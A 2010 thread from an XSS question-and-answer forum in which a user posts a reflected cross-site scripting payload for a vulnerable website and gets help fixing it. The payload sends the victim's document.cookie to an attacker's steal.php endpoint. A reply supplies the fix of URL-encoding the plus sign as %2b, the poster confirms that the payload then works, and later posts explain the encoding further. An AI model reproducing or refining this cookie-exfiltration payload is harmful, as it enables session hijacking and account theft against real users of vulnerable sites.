Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Whats wrong?
Posted by: Lofet
Date: March 27, 2010 09:22AM

I'm inputting the following code into a vulnerable website:

"><script>window.location = 'http://mysite.com/steal.php?cookie='+document.cookie;</script>

However the following works fine:

"><script>window.location = 'http://attacker.com/steal.php?cookie='</script>

It seems to be a problem with the +document.cookie; bit and I have no clue whats wrong with it, any help?

Options: ReplyQuote
Re: Whats wrong?
Posted by: Reiners
Date: March 27, 2010 09:28AM

urlencode the + to %2b if you use GET

Options: ReplyQuote
Re: Whats wrong?
Posted by: Lofet
Date: March 27, 2010 10:18AM

Worked, thank you. :)

Options: ReplyQuote
Re: Whats wrong?
Posted by: michee
Date: July 09, 2010 01:22AM

sorry, to bring this up guys, but i don't understand....
I also know, that there were a few threads about this, i've read them....

Why does this have to be encoded, as I do not need a literal '+' in the url?
Shouldn't this '+' just do a simple concatenation of 2 strings in javascript?
So that then you would be redirected to the resulted url string like this:

document.location = attackers_location_With_cookie_added;


I have also used this encoding on an ms-sql injection where i neededed to concatenate 2 fields.....but there I really needed to pass a literal '+' to the ms-sql server......

Also, wouldn't be better to run an escape on document.cookie? Just to make sure...

Options: ReplyQuote
Re: Whats wrong?
Posted by: PaPPy
Date: July 09, 2010 07:41AM

if you just use a + symbol browsers interpret it as a space.
but if you put the actual url encoded value of a plus symbol it will then combine the cookie and the URL.

http://www.xssed.com/archive/author=PaPPy/

Options: ReplyQuote
Re: Whats wrong?
Posted by: michee
Date: July 10, 2010 08:34AM

yeah, but as you also said in an other thread bellow, this is only true in the url bar......right?

Oh I got it now......but this is coppied from the url bar(actually passed to the server) and then echo'ed back in the html page...I got it now, thanks Pappy!:)

Options: ReplyQuote


Sorry, only registered users may post in this forum.